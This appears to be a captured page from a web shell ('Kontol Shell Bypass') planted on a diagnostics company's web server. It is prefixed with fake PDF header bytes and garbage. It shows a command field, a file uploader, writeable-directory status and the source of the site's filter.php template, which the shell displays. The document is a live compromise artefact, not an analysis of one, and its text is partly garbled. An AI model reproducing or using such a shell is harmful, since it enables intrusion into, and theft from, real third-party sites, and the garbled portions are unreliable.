%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardadiagnostics.in/application/views/templates/redlabel/_parts/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardadiagnostics.in/application/views/templates/redlabel/_parts/filter.php
<?php
$riskCategories = $this->Public_model->getRiskCategories();
$getServicetype = $this->Public_model->getServicetype();
$segment = $this->uri->segment(2);
?>
 <div class="col-sm-3 col-md-3 hidden-xs-down bg-faded sidebar leftSideBar">
                <div class="sidefilters">
                    <h3>Curent City</h3>
                    <select>
                        <option>Greater Noida</option>
                        <option>Noida</option>
                       <!-- <option>B</option>
                        <option>C</option> -->
                    </select>
                </div>
                <div class="clear"></div>                
                <h2 class="title_fiter"><i class="fa fa-sliders"></i> Filters <img src="<?=base_url('assets/imgs'); ?>/icons/arrowDown.png" /></h2>                
                <div class="clear"></div>
                
                <hr class="lineSidebar">
                <div class="clear"></div>
				<form name="filter_form" id="filter_form" method="post" action="<?=base_url()?>popularpackages">
				<div class="sidefilters">
                    <h3>Filter by</h3>
                    <div class="clear"></div>
					
                    <span>
					<ul id="searchstr">
					<input type="radio" id="radio1" name="searchstr" value="" <?php echo $checked; ?> onclick="return getRiskResults()" checked="checked">
					<label for="radio1">All</label>
					<input type="radio" id="radio2" name="searchstr" value="package" <?php echo $checked; ?> onclick="return getRiskResults()" <?php if($_REQUEST['searchstr']=='package') { echo 'checked="checked"'; }?>>
					<label for="radio2">Packages</label>
					<input type="radio" id="radio3" name="searchstr" value="tests" <?php echo $checked; ?> onclick="return getRiskResults()" <?php if($_REQUEST['searchstr']=='tests') { echo 'checked="checked"'; }?>>
					<label for="radio3">Tests</label> 
					</ul>
					<!--<a href="<?= LANG_URL ?>/PopularPackages" <?php if($_GET['searchstr']=='') { echo 'class="active"';}?> title="Package"> All </a> 
					<a href="<?= LANG_URL ?>/PopularPackages?searchstr=package" <?php if($_GET['searchstr']=='package') { echo 'class="active"';}?> title="Package"> Package </a> 
					<a href="<?= LANG_URL ?>/PopularPackages?searchstr=tests" <?php if($_GET['searchstr']=='tests') { echo 'class="active"';}?>  title="Tests">Tests </a> -->
                    </span> 
					
                </div>
				<div class="sidefilters">
                    <h3>Sort by Name</h3>
                    <div class="clear"></div>
                        <ul>
                            <li><input type="radio" name="letter" id="letter1" value="letter=asc" <?php echo $checked; ?> onclick="return getRiskResults()"
                            <?php if($_POST['letter']=='letter=asc') { echo 'checked="checked"'; }?>/>A to Z</li>
                            <li><input type="radio" name="letter" id="letter2" value="letter=desc" <?php echo $checked; ?> onclick="return getRiskResults()"
                            <?php if($_POST['letter']=='letter=desc') { echo 'checked="checked"'; }?>/>Z to A</li>
                        </ul>
                    </div>

				<div class="sidefilters">
                    <h3>Filter by Price</h3>
                    <div class="clear"></div>
                    <ul>
                        <li><input type="radio" name="price" id="price" value="price=asc" <?php echo $checked; ?> onclick="return getRiskResults()" <?php if($_POST['price']=='price=asc') { echo 'checked="checked"'; }?>/>Low to High</li>   
                        <li><input type="radio" name="price" id="price" value="price=desc" <?php echo $checked; ?> onclick="return getRiskResults()" <?php if($_POST['price']=='price=desc') { echo 'checked="checked"'; }?>/>High to Low</li>   
                    </ul> 
                <div class="clear"></div>
                </div>
                <div class="sidefilters">
                    <!--<h3>Filter by Risk Areas</h3>
                    <div class="clear"></div>
                    <ul>
					
						<?php 
						   foreach($riskCategories as $rckey=>$rcvalues) { 
							$risk_name = ucwords($rcvalues['name']);
							$risk_check_name = str_replace(" ","-",strtolower($rcvalues['name']));
							$checked = '';
							if($segment==$risk_check_name){ $checked = "checked = 'checked'"; }
						?>
						
                        <li><input type="checkbox" name="riskarea[]" id="name<?php echo $rcvalues['id']; ?>" value="<?php echo $rcvalues['id']; ?>" <?php echo $checked; ?> onclick="return getRiskResults('<?php echo $rcvalues['id'];?>')" <?php if(in_array($rcvalues['id'],$riskarea)) { echo 'checked="checked"'; }?> /><label for="name01"> <?php echo $risk_name;?></label></li>   
						
						<?php } ?>	
						
                    </ul>-->
					<h3>Filter by Test Type</h3>
                <div class="clear"></div>
                <ul>

                    <?php 
						   foreach($getServicetype as $Servicetype) { 
							$Servicetype = $Servicetype['service_type'];
							$checked = '';
							if($segment==$Servicetype){ $checked = "checked = 'checked'"; }
						?>

                    <li><input type="checkbox" name="test_type[]" id="name<?php echo $Servicetype['id']; ?>" value="<?php echo $Servicetype;?>" onclick="return getRiskResults()"
                        <?php if(in_array($Servicetype,$test_type)) { echo 'checked="checked"'; }?> /><label for="name<?php echo $rcvalues['id']; ?>"> <?php echo $Servicetype;?></label></li>

                    <?php } ?>

                </ul>
                <div class="clear"></div>
                </div>
				</form>
            <div class="clear"></div>
            </div>

Kontol Shell Bypass